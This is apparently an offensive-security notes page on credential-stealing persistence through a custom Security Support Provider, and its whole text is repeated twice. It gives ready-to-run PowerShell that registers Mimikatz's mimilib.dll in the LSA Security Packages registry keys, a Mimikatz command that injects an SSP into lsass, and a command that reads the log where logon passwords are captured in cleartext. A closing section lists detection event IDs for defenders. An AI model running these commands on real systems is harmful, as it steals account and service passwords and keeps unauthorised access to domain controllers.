Custom SSPs

General

A Security Support Provider (SSP) is a DLL which provides ways for an application to obtain an authenticated connection
Some SSP packages by Microsoft are
- NTLM
- Kerberos
- Wdigest
- CredSSP
Mimikatz provdes custom SSP - mimilib.dll
This SSP logs local logons, service account and machine aacount passwords in clear text on the target server

Exploitation

# First way: drop mimilib.dll to system32 and add mimilib to HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages
$packages = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' | Select -ExpandProperty 'Security Packages'
$packages += "mimilib"
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' -Value $packages
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name 'Security Packages' -Value $packages

# Second way: using mimikatz to inject into lsass (unstable with Server 2016)
Invoke-Mimikatz -Command '"misc::memssp"'

# All logons on the DC are logged to C:\Windows\system32\kiwissp.log
Get-Content C:\Windows\system32\kiwissp.log

Detection

Event IDs:
- 4657: Audit creation/change of HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\SecurityPackages
- 4624: Account Logon
- 4634: Account Logoff
- 4672: Admin Logon

PreviousACL Attacks NextDC Shadow

Last updated 2 years ago

Custom SSPs

General

A Security Support Provider (SSP) is a DLL which provides ways for an application to obtain an authenticated connection
Some SSP packages by Microsoft are
- NTLM
- Kerberos
- Wdigest
- CredSSP
Mimikatz provdes custom SSP - mimilib.dll
This SSP logs local logons, service account and machine aacount passwords in clear text on the target server

Exploitation

# First way: drop mimilib.dll to system32 and add mimilib to HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages
$packages = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' | Select -ExpandProperty 'Security Packages'
$packages += "mimilib"
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' -Value $packages
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name 'Security Packages' -Value $packages

# Second way: using mimikatz to inject into lsass (unstable with Server 2016)
Invoke-Mimikatz -Command '"misc::memssp"'

# All logons on the DC are logged to C:\Windows\system32\kiwissp.log
Get-Content C:\Windows\system32\kiwissp.log

Detection

Event IDs:
- 4657: Audit creation/change of HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\SecurityPackages
- 4624: Account Logon
- 4634: Account Logoff
- 4672: Admin Logon

PreviousACL Attacks NextDC Shadow

Last updated 2 years ago